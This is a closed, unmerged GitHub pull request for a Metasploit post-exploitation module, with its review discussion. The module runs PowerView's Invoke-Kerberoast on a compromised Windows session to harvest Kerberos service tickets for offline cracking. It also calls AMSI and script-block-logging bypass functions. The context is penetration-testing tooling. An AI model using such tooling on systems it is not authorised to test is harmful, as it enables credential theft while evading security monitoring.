### PR TITLE
Integrate PowerView's Invoke-Kerberoast

### LINKED ISSUE #4556: Kerberos Service Principal Tickets for Offline Brute Forcing
Using the Kerberos library it would be awesome if we could create an aux scanner/gather module which pulled down Kerberos tickets for offline brute force password attacks, ala https://github.com/nidem/kerberoast

It could also be implemented as a Post module using the Kiwi extension...

### PR DESCRIPTION
**Pull request by phra**
This PR adds PowerView's `Invoke-Kerberoast` into a post module.

It will fix #4556
~Depends on https://github.com/rapid7/rex-powershell/pull/16~

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a meterpreter session on Windows
- [x] `use post/windows/gather/kerberoast`
- [x] `set Powershell::strip_comments false`
- [x] `set CMD "Get-Help Invoke-Kerberoast"`
- [x] `run`
- [x] Retrieve Invoke-Kerberoast usage

image

### CODE REVIEW

File: modules/post/windows/gather/kerberoast.rb [hunk 1]
```diff
@@ -0,0 +1,52 @@
...
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Powershell
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Common
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Kerberoast',
+      'Description' => %q(This module load in memory PowerView.ps1 and executes Invoke-Kerberoast.),
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]:
```ruby
'Description' => %Q(This module loads PowerView.ps1 into memory and executed Invoke-Kerberoast.),
```

File: modules/post/windows/gather/kerberoast.rb [hunk 2]
```diff
@@ -0,0 +1,52 @@
...
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'harmj0y', # Invoke-Kerberoast
+        'phra' # MSF Module
+      ],
+      'References' => [''],
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]: Link: 
- https://github.com/PowerShellEmpire/PowerTools
- https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

File: modules/post/windows/gather/kerberoast.rb [hunk 3]
```diff
@@ -0,0 +1,52 @@
...
+      [
+        OptString.new('CMD', [ true, 'Example: Invoke-Kerberoast | fl', 'Get-Help Invoke-Kerberoast' ])
+      ],
+      self.class
+    )
+  end
+
+  def run
+    if have_powershell?
+      print_good('PowerShell is installed.')
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]: This probably isn't needed, use `vprint_good` instead

File: modules/post/windows/gather/kerberoast.rb [hunk 4]
```diff
@@ -0,0 +1,52 @@
...
+    else
+      print_error('PowerShell is not installed! STOPPING')
+      return
+    end
+
+    bypass_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "Invoke-Bypass.ps1"))
+    bypass_script += "\r\nInvoke-BypassAMSI;Invoke-BypassScriptBlockLog;\r\n"
+    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "PowerView.ps1"))
+    print_status("Executing: #{datastore['cmd']}")
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]: `datastore['CMD']` for consistency

File: modules/post/windows/gather/kerberoast.rb [hunk 5]
```diff
@@ -0,0 +1,52 @@
...
+    ps_output = psh_exec("#{bypass_script}\r\n#{base_script}\r\n#{datastore['cmd']}")
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]: `datastore['CMD']` for consistency

File: modules/post/windows/gather/kerberoast.rb [hunk 6]
```diff
@@ -0,0 +1,52 @@
...
+      'Author' => [
+        'harmj0y', # Invoke-Kerberoast
+        'phra' # MSF Module
+      ],
+      'References' => [''],
+      'Platform' => [ 'win' ],
+      'Arch' => [ 'x86', 'x64' ],
+      'SessionTypes' => [ 'meterpreter' ]
+    )
+  )
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]:
```
    ))
```
not 
```
    )
  )
```

File: modules/post/windows/gather/kerberoast.rb [hunk 7]
```diff
@@ -0,0 +1,52 @@
...
+
+    register_options(
+      [
+        OptString.new('CMD', [ true, 'Example: Invoke-Kerberoast | fl', 'Get-Help Invoke-Kerberoast' ])
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]: Explain what this option is/does, not just an example.

Eg:
```ruby
OptString.new('CMD', [true, 'The command to execute (eg. Invoke-Kerberoast | fl)', 'Get-Help Invoke-Kerberoast'])
```

File: modules/post/windows/gather/kerberoast.rb [hunk 8]
```diff
@@ -0,0 +1,52 @@
...
+      'Description' => %q(This module load in memory PowerView.ps1 and executes Invoke-Kerberoast.),
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'harmj0y', # Invoke-Kerberoast
+        'phra' # MSF Module
+      ],
+      'References' => [''],
+      'Platform' => [ 'win' ],
+      'Arch' => [ 'x86', 'x64' ],
+      'SessionTypes' => [ 'meterpreter' ]
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]: Has it been tested on other session types?

**Review by cbrnrd — CHANGES_REQUESTED** [review]

File: modules/post/windows/gather/kerberoast.rb (hunk 8 above)
Comment (phra) [reply modules/post/windows/gather/kerberoast.rb]: no

File: modules/post/windows/gather/kerberoast.rb [hunk 9]
```diff
@@ -12,18 +12,17 @@ def initialize(info = {})
...
       'Name' => 'Kerberoast',
-      'Description' => %q(This module load in memory PowerView.ps1 and executes Invoke-Kerberoast.),
+      'Description' => %q(This module load into memory PowerView.ps1 and executes Invoke-Kerberoast.),
       'License' => MSF_LICENSE,
       'Author' => [
         'harmj0y', # Invoke-Kerberoast
         'phra' # MSF Module
       ],
-      'References' => [''],
+      'References' => ['https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1'],
```
Comment (cbrnrd) [inline modules/post/windows/gather/kerberoast.rb]:
```ruby
'References' => 
  [
	['URL', 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1']
  ]
```

Comment (phra) [reply modules/post/windows/gather/kerberoast.rb]: it's the same

**Comment by Chiggins** [comment]
Being a bit of a devil's advocate here, we've already got `auxiliary/gather/get_user_spns` to request TGS tickets for accounts with SPNs for offline cracking. What addition would this bring, beside just doing this through Powershell?

Also, I think that importing all of PowerView is unnecessary. If you want to do this in Powershell, just take the parts entirely necessary for this.

**Comment by phra** [comment]
The idea was to make all Powerview available via msf. Maybe it's better to rename the module. What do you think?

**Comment by Chiggins** [comment]
While I think that PowerView is an extremely useful tool, I think that there are better ways to go about this. Instead of importing all of PowerView, why not implement pieces one at a time as separate auxiliary modules?

Maybe someone from R7 could comment in and provide some insight.

**Comment by jmartin-r7** [comment]
I would agree with @Chiggins that importing the entire tool like this seems excessive.  Also the original request #4556 is asking for offline processing that this looks it process on the target system.

**Comment by jmartin-r7** [comment]
Closing, this is not the route we want to go with this.

**Pull request closed without merging**